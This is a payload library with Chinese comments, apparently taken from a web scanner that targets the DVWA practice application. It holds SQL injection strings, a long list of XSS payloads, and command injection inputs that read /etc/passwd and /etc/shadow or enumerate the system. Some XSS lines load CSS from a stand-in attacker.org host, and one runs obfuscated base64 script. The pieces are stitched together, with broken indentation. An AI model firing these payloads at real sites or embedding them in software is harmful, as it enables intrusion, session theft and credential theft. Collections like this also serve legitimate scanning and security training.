# SQL注入payload库
        self.payloads = {
            'error_based': [
                "'", "''", "`", "\\'", "\"", "\\\"", ";",
                "' OR '1'='1", "' OR 1=1--", "') OR ('1'='1",
                "' OR '1'='1'--", "' OR 'a'='a", "' OR 1=1#",
                "' OR 1=1-- -", "' OR 1=1/*"
            ],
            'boolean_true': [
                "' AND '1'='1", "' AND 1=1--", "') AND ('1'='1",
                "' OR '1'='1'--", "' AND 1=1#"
            ],
            'boolean_false': [
                "' AND '1'='2", "' AND 1=2--", "') AND ('1'='2",
                "' OR '1'='2'--", "' AND 1=2#"
            ],
            'union_based': [
                "' UNION SELECT 1--",
                "' UNION SELECT 1,2--",
                "' UNION SELECT 1,2,3--",
                "' UNION ALL SELECT 1--",
                "' UNION SELECT NULL--",
                "' UNION SELECT 1,2,3,4--",
                "' UNION SELECT 1,2,3,4,5--"
            ]
        }
 # XSSpayload库
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<body onload=alert('XSS')>
<a href="javascript:alert('test')">link</a>
<a href="javascript:alert('xss')">link</a>
<a href='vbscript:MsgBox("XSS")'>link</a>
<a href="vbscript:alert(1)">Hello</a>
<a href="vbscript:alert(1)">Hello</a>
<a href=javascript:alert("XSS")>link</a>
<style>@import url("http://attacker.org/malicious.css");</style>
<style>@imp\ort url("http://attacker.org/malicious.css");</style>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">
<div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<div onclick="alert('xss')">
<div onmouseenter="alert('xss')">
<div onclick ="alert('xss')">
<BODY ONLOAD=alert('XSS')>
<script src="http://baidu.com"></script><script>Function(atob('YWxlcnQoInhzcyIp'))()</script>
<script>alert("XSS")</script>
<scr<script>ipt>alert("XSS")</scr<script>ipt>
<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>
#命令注入payload库
        self.payloads = {
            'basic': ['127.0.0.1', 'localhost'],
            'unix_commands': [
                '; whoami', '; id', '; pwd', '; ls', '; ls -la', '; cat /etc/passwd',
                '| whoami', '| id', '&& whoami', '&& id', '|| whoami',
            ],
            'windows_commands': [
                '& whoami', '| whoami', '&& whoami', '|| whoami', '& ipconfig', '& dir', '& net user'
            ],
            'blind_injection': [
                '; sleep 3', '| sleep 3', '&& sleep 3', '; ping -c 3 127.0.0.1', '& ping -n 3 127.0.0.1'
            ],
            'file_operations': [
                '; cat /etc/passwd', '; cat /etc/shadow', '; head -n 10 /etc/passwd',
                '; tail -n 10 /etc/passwd', '& type C:\\Windows\\win.ini'
            ],
            'system_info': [
                '; uname -a', '; ps aux', '; netstat -an', '& systeminfo', '& tasklist'
            ]
        }

        self.command_indicators = {
            'unix': ['root', 'www-data', 'daemon', 'nobody', '/home/', '/var/www/', '/etc/passwd', 'uid=', 'gid='],
            'windows': ['Administrator', 'System32', 'Windows', 'C:\\', 'Program Files', 'win.ini', 'boot.ini'],
            'common': ['whoami', 'pwd', 'ls', 'dir', 'id', 'ipconfig', 'ifconfig']
        }
        self.error_indicators = [
            'command not found', 'not recognized', 'permission denied', 'no such file', 'syntax error', 'cannot find'
        ]

        self.default_headers = {'User-Agent': 'Mozilla/5.0 (DvwaScanner/Fixed)'}
